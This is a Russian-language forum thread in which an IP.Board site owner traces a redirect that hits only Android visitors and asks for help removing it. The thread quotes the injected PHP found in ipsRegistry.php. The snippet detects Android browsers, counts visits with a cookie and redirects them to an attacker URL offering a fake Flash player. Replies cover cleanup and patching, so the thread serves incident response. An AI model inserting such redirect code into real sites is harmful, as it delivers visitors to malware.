Jump to content

Вредносной код на сайте / перекидывает ну чужой сайт

Featured Replies

/admin/ 0755
/cache/ 0777
/cache/lang_cache 0777
/cache/lang_cache/1/ 0777
/cache/skin_cache/ 0777
/cache/tmp/ 0777
/converge_local/ 0755
/hooks/ 0777
/interface/ 0755
/ips_kernel/ 0755
/lofiversion/ 0755
/public/style_images/ 0777
/public/style_css/ 0777
uploads 0777
conf_global.php 0777
 
Для начала нужно выяснить куда перекидывает.

Никуда не перекидывает, и слава Богу. Я хотел сделать это в качестве профилактики. Однако, на всех папках у меня установлено 755, а на всех файлах 644. При этом всё прекрасно работает. Может, стоит именно до такой степени перекрывать доступ?

Разработчик рекомендует. По желанию так сказать :) 

Respected, Паша, моих пользователей перекидывает на сайт _www.kirkdavidson.com 

Папка cache чистая? Файлов с подозрительным названием не замечено?

а папке cache много файлов. Паш, глянь лучше сам.

и парни говорят что проблема толко у тех, у кого телефон на andorid, у других вроде все ок

Вот полная ссылка вируса куда перекидывает www.kirkdavidson.com/js/fp.html

Вот тут ребята тоже разбирались, походу у них сидит, но так и не разобрались: тынц

  • 2 недели спустя...

Народ? ну помогите у меня никто с андройда зайти на сайт не может, перекидывает на сайт что описано выше и просит установить флеш плеер.

По вирусчекеру ничего не обнаружено. 

Если везде искал, могу посоветовать лишь слить базу и искать по названию сайта, если не поможет - сливать все файлы форума и искать уже по ним.

Какой прогой искать?

Folder Find Text

попробуйте вот этим скриптом поискать revisium.com/ai/

лично меня уже спасал не раз

Folder Find Text

 

Скачал сайт на комп, ввел поиск и нашел этот код в папке big-benz.ru/admin/sources/base/ipsRegistry.php

 

Содержание в самом низу файла такое:

$mbrowser = mobile_device_detect();
$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;
if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {
    setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");
    header("Location: __www.kirkdavidson.com/js/fp.html");
    exit;
}

Ну вот, а ты панику бил :) 

Замени этот файл оригинальным с той же версии IP.Board

После того как заменил на форуме вылезла ошибка

Fatal error: Cannot redeclare mobile_device_detect() (previously declared in /home/bigbenz/data/www/big-benz.ru/admin/sources/base/ipsController.php:480) in /home/bigbenz/data/www/big-benz.ru/cache/skin_cache/cacheid_26/skin_global.php on line 2100

 

пришлось возвращать старый файл

Замените этот файл, затем admin/sources/base/ipsController.php, затем перестройте кэш стилей.

Столкнулся с аналогичной проблемой сегодня, тоже редирект на киркдавдисона... Тот же самый файл... закоментил код, посмотрим, что будет.

Узнать бы как себя обезопасить от подобных вставок кода в файлы форума... Есть соображения?

Использовать последние версии форума и устанавливать актуальные патчи безопасности.


Использовать последние версии форума и устанавливать актуальные патчи безопасности.

Ну, патчи ставим по мере поступления, тут уже даже не от меня зависит. Их поступление должен отслеживать человек, ответственный за форумы (в данном случае это не совсем я=) ), поэтому не всё удаётся сделать своевременно. Зато потом приходится оперативно искать баги, "ковырякаться" =).

А в целом идея с последними версиями и патчами - само самой разумеется.

Народную медицину в виде скриптов-самописок не приветствуете?


Народную медицину в виде скриптов-самописок не приветствуете?

От этой народной медицины может стать и ещё хуже, так что не советую как раз ничего делать этим путём.

  • 3 недели спустя...

Забавная вещь вышла. Опять появился редирект... Тот же на давидсона и там же. Исправил, пошёл ковырять, чтобы что-нибудь найти. Наткнулся на понял, что делал почти аналогичные действия с теми же самыми файлами-картинками и никак не мог найти ответа в интернете, собственно в то же время и зарегистрировался тут, чтобы попытаться найти ответы, но увы и ах (ну что и не удивительно, ведь статья вышла позже). В итоге зачитал ещё что спасибо отдельное), полез в cashe и отрыл там ещё один вирь(к слову не sh.php, а просто абракадабра.php), который был незамедлительно удалён...

Жду новых поступлений...

Патчи безопасности необходимо было ставить.

Если вы уже установили все патчи безопасности — все в порядке.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.


Guest
Ответить в этой теме...

Последние посетители 0

  • No registered users viewing this page.